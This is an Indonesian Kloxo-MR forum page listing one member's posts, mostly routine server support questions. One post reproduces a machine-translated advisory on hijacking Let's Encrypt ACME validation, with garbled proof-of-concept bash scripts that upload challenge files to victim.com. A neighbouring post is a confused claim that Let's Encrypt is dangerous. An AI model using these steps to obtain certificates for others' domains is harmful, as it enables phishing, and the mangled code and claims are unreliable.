Sponsor:

Server and Web Integrator
Link:
Kloxo-MR logo
6.5.0 or 7.0.0
Click for "How to install"
Donation/Sponsorship:
Kloxo-MR is open-source.
Donate and or Sponsorship always welcome.
Click to:
Click Here
Please login or register. 2018-12-18, 15:29:28

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Miki

Pages: [1] 2 3 ... 12
1
Beberapa kali saya merasakan ada yang aneh dengan SSL Jenis Let's Encrypt, domain yang dipasang Let's Encrypt ini tiba-tiba meredirek ke alamat ip dan membuat heboh.

Bagimana ini bisa terjadi ?

Berdasarkan hasil penelusuran menyatakan bahwa Let's Encrypt ini berbahaya, ada indikasi attacker executes pada domain.tld kerena pengunjung sudah menyimpan auto redirek pada domain ke SLL, maka hanya tinggal menunggu waktu untuk meng Exploit domainnya.

Bagaimana cara mengebalikan atau memulihkan kembali domain yang sudah terpasang SSL menjadi non SSL dan menghapus  sertifikat di seluruh pengujung agar tidak menggunakan jalur SSL?

2
1. Ikhtisar

Let's Encrypt dapat diakali dengan mengeluarkan sertifikat SSL ke remote
penyerang dengan membajak tantangan ACME melalui eksploitasi jarak jauh yang mungkin
ada di situs web korban.


2. Detail

The Let's Encrypt Certificate Authority dapat disalahgunakan untuk mengeluarkan SSL
sertifikat untuk penyerang, dengan memanfaatkan berbagai remote
teknik eksploitasi yang membajak rutinitas validasi tantangan ACME.
Dalam setiap skenario yang disajikan, sertifikat diminta dan diberikan pada a
mesin remote dikendalikan oleh penyerang. Mari Enkripsi utilitas (seperti
certbot) tidak perlu dipasang di server yang menghosting situs web korban.

Beberapa skenario serangan disajikan:
1) Memanfaatkan kerentanan pengunggahan file tak terbatas di situs web korban
2) Memanfaatkan izin miskin dalam lingkungan hosting bersama
3) Memanfaatkan serangan Man In the Middle (MITM) untuk mengubah lalu lintas jaringan
4) Memanfaatkan proxy berbahaya untuk mengubah lalu lintas HTTP

Setiap skenario membutuhkan kerentanan jarak jauh untuk ada di situs web korban
atau lingkungan yang dihosting; namun, dengan menambahkan pengamanan tambahan, Let's Encrypt
dapat mencegah sertifikat palsu dikeluarkan untuk penyerang.


3. Dampak

Penyerang yang mendapatkan sertifikat SSL yang valid untuk situs web korban dapat menggunakannya
kepada pengunjung situs web phishing.

Jika penyerang dapat: 1) menipu pengunjung agar menggunakan server DNS berbahaya
atau 2) menggunakan serangan tingkat jaringan seperti keracunan ARP cache untuk mengalihkan DNS
permintaan ke server web palsu, pengunjung akan dikirim ke kloning
situs web, menggunakan nama domain yang sama, dengan sertifikat SSL yang valid, memaksimalkan
keberhasilan kampanye phishing.


4. Eksploitasi

Eksploitasi untuk skenario pengunggahan file tidak terbatas disediakan, dan
menunjukkan bagaimana validasi tantangan ACME dapat dibajak. Yang lain
Skenario serangan dijelaskan dalam istilah teoritis dan diyakini
dieksploitasi karena masing-masing membajak validasi tantangan ACME.


4a. Exploit - Proof of Concept (Pengunggahan File Tidak Terbatas)

Dalam skenario berikut ini, kami menemukan situs web korban yang mencakup
kerentanan jarak jauh, yang memungkinkan pengunggahan file tanpa batas dan nyaman
(dan tidak realistis) memindahkan file langsung ke .well-known / acme-challenge
direktori. Meskipun skenario ini kemungkinan tidak akan pernah terjadi, ini menunjukkan hal itu
tantangan ACME dapat dihasilkan pada mesin jarak jauh dan untuk sementara ditempatkan
situs web korban untuk memvalidasi tantangan. Sertifikat ini kemudian diterbitkan
mesin penyerang.

    # Script Rentan: http://victim.com/le-receive.php
    # Remote penyerang menggunakan skrip berikut: lt-waitsend.sh

    #! / bin / bash

    FAKEWEBROOT = / tmp / fake / .well-known / acme-challenge

    # Terus periksa apakah certbot telah menghasilkan tantangan ACME
    # dan unggah ke korban segera setelah tersedia
    sampai [-f $ {FAKEWEBROOT} / *]
    melakukan
      tidur 0,1
    selesai
    lefile = `ls -1 $ {FAKEWEBROOT} / *`
    echo "Ditemukan $ {lefile}"
    curl -i -X ??POST -H "Content-Type: multipart / form-data"
        -F "data = @ $ {lefile}" http://victim.com/le-receive.php
    keluar


    # Remote penyerang mengeksekusi yang berikut:

    ~ $ ./lt-waitsend.sh
    ~ $ ./certbot-auto certonly --staging --no-self-upgrade
        --webroot -w / tmp / fake -d victim.com


4b. Exploit - Skenario Realistis (Pengunggahan File Tidak Terbatas)

Skenario yang lebih realistis disajikan di mana victim.com menyertakan skrip yang
memungkinkan pengunggahan file tidak terbatas dan webroot dimiliki oleh pengguna apache.

    # Script Rentan: http://victim.com/le-receive2.php:
    # Penyerang mengunggah skrip berikut (le-create.php) ke victim.com melalui
    # Kerentanan jarak jauh. Skrip akan menunggu tantangan ACME
    # Diunggah melalui kerentanan jarak jauh dan memindahkannya ke lokasi yang benar

    # Penyerang memanfaatkan skrip berikut untuk menghasilkan sertifikat dan
    # memindahkannya ke tempatnya: lt-waitsend.sh

    #! / bin / bash

    FAKEWEBROOT = / tmp / fake / .well-known / acme-challenge

    sampai [-f $ {FAKEWEBROOT} / *]
    melakukan
        tidur 0,1
    selesai
    lefile = `ls -1 $ {FAKEWEBROOT} / *`
    echo "Ditemukan $ {lefile}"
    curl -i -X ??POST -H "Content-Type: multipart / form-data"
        -F "data = @ $ {lefile}" http://victim.com/le-receive.php
    curl http://victim.com/temp/le-create.php
    keluar

    # Remote penyerang mengeksekusi yang berikut:
    ~ $ ./lt-waitsend.sh
    ~ $ ./certbot-auto certonly --staging --no-self-upgrade
         --webroot -w / tmp / fake -d victim.com

    # Pada titik ini penyerang dapat membersihkan file jauh untuk tidak meninggalkan jejak.


4c. Eksploitasi Diskusi

Eksploitasi di atas menunjukkan bahwa tantangan ACME dapat dihasilkan pada a
mesin penyerang jarak jauh dan ditransfer sementara ke mesin korban
melalui kerentanan jarak jauh, memungkinkan tantangan untuk divalidasi dan
mengeluarkan sertifikat kepada penyerang.

Demikian juga, lingkungan hosting bersama yang tidak dikonfigurasi dengan baik dapat menyajikan
masalah yang sama. Misalnya jika dua situs web di server yang sama keduanya memiliki webroots
dimiliki oleh apache: apac

3
apakah mail.domain.tld dan webmail.domain.tld ini berada di direkori yang sama ?
jika ia mengapa ketika kita panggil mail.domain.tld membuka halaman kosong. beda dengan ketika membuka webmail.domain.tld

saya masih penasaran dgn prihal diatas.. terimakasih pak MR sblmnya..

4
jika saaat membuka mail.domainkita.tld tidak ter redirect ke halaman login pada webmail.domainkita.tld bagian yang mana yang perlu diperbaiki?

Terimakasih

5
mail.domainkita.tld dimana Pak MR foldernya?

bukan yg webmail.domainkita.tld tapi yg mail.domainkita.tld

Terimakasih.

6
Lantas bagaimana cara mengarahkan agar mail.duomainku.com bisa ke halaman login webmail atau halaman apa dan dimana letak direktorinya ketika kita buka mail.duomainku.com ini?

saya mau buat seperti mail.gmail.com, mail.yahoo.com kira-kira seperti itu pak MR

Terimakasih

7
Indonesia Users / ASK minta petunjuk terkait mail.domain.tld
« on: 2017-09-08, 11:28:36 »
Mohon petujuknya:
Tidak dapat membuat damain baru atau pun subdomain : dengan nama mail.domain.tld

Alert: Not permit webmail/mail/lists/cp/www/default as subdomain [mail.domain.tld]

bagaimana agar mail.domain.tld tersebut bisa di isi konten layaknya sebuah situs?

Terimakasih sebelumnya.

8
Indonesia Users / ask HTTPD FAILED
« on: 2016-09-15, 21:36:06 »
 :o Sudah dibulak balik tetap falied.. how to fix.. ?
Code: [Select]
*** Restart services - BEGIN ***

Shutting down MySQL. SUCCESS!
Starting MySQL. SUCCESS!
-------------------------------------------------------------------

Stopping httpd:                                            [FAILED]
Starting httpd: httpd.event: Syntax error on line 63 of /etc/httpd/conf/httpd.conf: Syntax error on line 4 of /etc/httpd/conf.d/fastcgi.conf: Cannot load /etc/httpd/modules/mod_fastcgi.so into server: /etc/httpd/modules/mod_fastcgi.so: cannot open shared object file: No such file or directory
                                                           [FAILED]
-------------------------------------------------------------------

Stopping Hiawatha web server:                              [  OK  ]
Starting Hiawatha web server:                              [  OK  ]
-------------------------------------------------------------------


*** Process for QMAIL service ***
Stopping qmail-toaster: svscan qmail logging.
qmail-send: no process killed
Starting qmail-toaster: svscan.
-------------------------------------------------------------------

- For help, type '/script/restart-mail [--help|-h]'
-------------------------------------------------------------------

Stopping pure-ftpd:                                        [  OK  ]
Starting pure-ftpd:                                        [  OK  ]
-------------------------------------------------------------------

Stopping php55m-fpm (PHP Used):                            [  OK  ]
Starting php55m-fpm (PHP Used):                            [  OK  ]
-------------------------------------------------------------------
*** Restart services - END ***

Code: [Select]
A. Control Panel:
   - Kloxo-MR: 7.0.0.b-2016091501
   - Web: hiawatha-10.3.0-f.1.mr.el5
   - PHP: php54s-5.4.45-1.ius.el5 (fpm mode)
B. Plateform:
   - OS: CentOS release 5.11 (Final) x86_64
   - Hostname: my.domain.tld
C. Services:
   1. MySQL: MariaDB-server-10.0.27-1
   2. PHP:
      - Installed:
        - Branch: php54-cli-5.4.45-1.ius.el5
        - Multiple:
          * php52m-5.2.17-102.mr.el5
          * php53m-5.3.29-1.ius.el5
          * php54m-5.4.45-1.ius.el5
          * php55m-5.5.38-1.w5
      - Used: php55m-fpm
      - Multiple: disable
   3. Web Used: hiawathaproxy
     - Hiawatha: hiawatha-10.3.0-f.1.mr.el5
     - Lighttpd: lighttpd-1.4.39-3.el5
     - Nginx: nginx-1.11.4-1.el5.ngx
     - Apache: httpd-2.2.31-1.mr.el5
       - PHP Type: php-fpm_event
       - Secondary PHP: on
   4. WebCache: varnish
     - ATS: --uninstalled--
     - Squid: --uninstalled--
     - Varnish: --uninstalled--
   5. Dns: bind
     - Bind: --uninstalled--
     - DJBDns: --uninstalled--
     - NSD: --uninstalled--
     - PowerDNS: --uninstalled--
     - Yadifa: --uninstalled--
   6. Mail: qmail-toaster-1.03-1.3.55.mr.el5
      - pop3/imap4: none
      - smtp: none
      - spam: --uninstalled--
   7. Stats: awstats
D. Memory:
                total       used       free     shared    buffers     cached
   Mem:         15047       1387      13659          0         88        792
   -/+ buffers/cache:        506      14540
   Swap:        17055          0      17055

9
Indonesia Users / Re: ask install phalcon
« on: 2016-09-12, 14:50:09 »
Mohon petunjuk install phalcon gagal teyuz  ;D

Beraih ke php55 akhirnya :D:
Code: [Select]
Libraries have been installed in:
   /home/userid/cphalcon/build/php5/64bits/modules

If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
   - add LIBDIR to the `LD_LIBRARY_PATH' environment variable
     during execution
   - add LIBDIR to the `LD_RUN_PATH' environment variable
     during linking
   - use the `-Wl,-rpath -Wl,LIBDIR' linker flag
   - have your system administrator add LIBDIR to `/etc/ld.so.conf'

See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------

Build complete.
Don't forget to run 'make test'.

Installing shared extensions:     /usr/lib64/php/modules/
Installing header files:          /usr/include/php/

Thanks for compiling Phalcon!
Build succeed: Please restart your web server to complete the installation

test restart..  hasinya :(
Code: [Select]
Stopping httpd:                                            [FAILED]
Starting httpd: httpd.event: Syntax error on line 63 of /etc/httpd/conf/httpd.conf: Syntax error on line 4 of /etc/httpd/conf.d/suphp2.conf: Cannot load /etc/httpd/modules/mod_suphp.so into server: /etc/httpd/modules/mod_suphp.so: cannot open shared object file: No such file or directory
                                                           [FAILED]

Clear..  ;)
Code: [Select]
Shutting down system logger:                               [  OK  ]
Starting system logger:                                    [  OK  ]
-------------------------------------------------------------------

Stopping httpry:                                           [  OK  ]
Starting httpry:                                           [  OK  ]
-------------------------------------------------------------------

Shutting down MySQL. SUCCESS!
Starting MySQL. SUCCESS!
-------------------------------------------------------------------

Stopping named: .                                          [  OK  ]
Starting named:                                            [  OK  ]
-------------------------------------------------------------------

Stopping php55m-fpm (PHP Used):                            [  OK  ]
Starting php55m-fpm (PHP Used):                            [  OK  ]
-------------------------------------------------------------------

Stopping php52m-fpm (Multiple Php):                        [  OK  ]
Stopping php53m-fpm (Multiple Php):                        [  OK  ]
Stopping php54m-fpm (Multiple Php):                        [  OK  ]
Stopping php55m-fpm (Multiple Php):                        [  OK  ]
Stopping php56m-fpm (Multiple Php):                        [  OK  ]
Stopping php70m-fpm (Multiple Php):                        [  OK  ]

Starting php52m-fpm (Multiple Php):                        [  OK  ]
Starting php53m-fpm (Multiple Php):                        [  OK  ]
Starting php54m-fpm (Multiple Php):                        [  OK  ]
Starting php55m-fpm (Multiple Php):                        [  OK  ]
Starting php56m-fpm (Multiple Php):                        [  OK  ]
Starting php70m-fpm (Multiple Php):                        [  OK  ]
-------------------------------------------------------------------

Stopping Hiawatha web server:                              [  OK  ]
Starting Hiawatha web server:                              [  OK  ]
-------------------------------------------------------------------

Stopping httpd:                                            [  OK  ]
Starting httpd:                                            [  OK  ]
-------------------------------------------------------------------


*** Process for QMAIL service ***
Stopping qmail-toaster: svscan qmail logging.
qmail-send: no process killed
Starting qmail-toaster: svscan.
-------------------------------------------------------------------

- For help, type '/script/restart-mail [--help|-h]'
-------------------------------------------------------------------

Stopping pure-ftpd:                                        [  OK  ]
Starting pure-ftpd:                                        [  OK  ]
-------------------------------------------------------------------

Stopping kloxo-phpcgi:                                     [  OK  ]
Starting kloxo-phpcgi ('php54s' in 'fpm' mode):            [  OK  ]
Stopping kloxo-hiawatha:                                   [  OK  ]
Starting kloxo-hiawatha:                                   [  OK  ]
-------------------------------------------------------------------

10
Indonesia Users / Re: ask install phalcon
« on: 2016-09-12, 13:47:45 »
Mohon petunjuk install phalcon gagal teyuz  ;D

Beraih ke php55 akhirnya :D:
Code: [Select]
Libraries have been installed in:
   /home/userid/cphalcon/build/php5/64bits/modules

If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
   - add LIBDIR to the `LD_LIBRARY_PATH' environment variable
     during execution
   - add LIBDIR to the `LD_RUN_PATH' environment variable
     during linking
   - use the `-Wl,-rpath -Wl,LIBDIR' linker flag
   - have your system administrator add LIBDIR to `/etc/ld.so.conf'

See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------

Build complete.
Don't forget to run 'make test'.

Installing shared extensions:     /usr/lib64/php/modules/
Installing header files:          /usr/include/php/

Thanks for compiling Phalcon!
Build succeed: Please restart your web server to complete the installation

test restart..  hasinya :(
Code: [Select]
Stopping httpd:                                            [FAILED]
Starting httpd: httpd.event: Syntax error on line 63 of /etc/httpd/conf/httpd.conf: Syntax error on line 4 of /etc/httpd/conf.d/suphp2.conf: Cannot load /etc/httpd/modules/mod_suphp.so into server: /etc/httpd/modules/mod_suphp.so: cannot open shared object file: No such file or directory
                                                           [FAILED]

11
Indonesia Users / ask install phalcon
« on: 2016-09-12, 11:36:23 »
Mohon petunjuk install phalcon gagal teyuz  ;D

12
Jika anda lihat ke '/var/qmail/supervise/smtp/run' misalnya maka ada 2 factor penentu yaitu 'hosname' dan 'IP'. Bisa jadi ini tidak match karena 'hostname' ambil dari perintah 'hostname' (setara 'hostname -f') sedangkan 'IP' ditetapkan sebagai '0' (setara dengan '0.0.0.0') yang artinya 'yang tersedia/terdeteksi'. Mungkin akan saya tambahkan logika dimana mungkin di-customize.
ok sip.. thx 4 support nya.. saya senantiasa menanti info customenya..

13
Indonesia Users / Re: server alias MR7
« on: 2015-04-12, 15:35:14 »
Mengapa tidak pakai '*' (wildcards) saja?.
waduh kalau pakai ini yang ada bisa berantakan semua wildcard lari ke satu domain.. saya lebih suka bisa membuat banyak subdomain dari pada mengalihkan seluruh sub pada satu domain'.. hal seperti ini pada versi sebelumnya dulu kita pernah membahasnya.. saya merasa sudah cukup dan bermanfaat atas pencerahaan diatas yang Master berikan..

14
Jika masuk 'spam' coba di 'non spam'. Biasanya untuk selanjutnya tidak masuk lagi.
repot master.. masa harus bikin surat berita baik melalui sms, stasiun tv, stasiun radio dan berbagai majalah maupun sosial media bahwa semua penerima email dari saya harap bukan kotak spam pada gmailnya kemudian klik laporkan bahwa email ini bukan spam..

ada cara lainkah?

info tambahan: hasil diagnosa
- domain pertama IP 100.100.1001
- domain kedua IP 100.100.100.2
IP pengirim tidak sama dengan IP domain.
IP pengirim ternyata menggunakan IP Pertama yang seharusnya menggunakan IP kedua.

15
Indonesia Users / kirim email ke gmail mr7 di anggap spam
« on: 2015-04-12, 15:18:28 »
berdasarkan hasil investigasi dari http://www.intodns.com/ nilai rapotnya tidak ada yang merah tetapi masih saja email di anggap spam  ::)

semua fitur berikut sudah di aktifkan semua:

Domainkeys
Enable Spamdyke
Enable SPF
Enable DMARC

Mohon pencerahannya master..
PTR pun sudah didaftarkan ke ISP nya..

info tambahan: hasil diagnosa
- domain pertama IP 100.100.1001
- domain kedua IP 100.100.100.2
IP pengirim tidak sama dengan IP domain.
IP pengirim ternyata menggunakan IP Pertama yang seharusnya menggunakan IP kedua.

Thx

Pages: [1] 2 3 ... 12

Top 4 Global Search Engines:    Google    Bing    Baidu    Yahoo

Page created in 0.045 seconds with 22 queries.

web stats analysis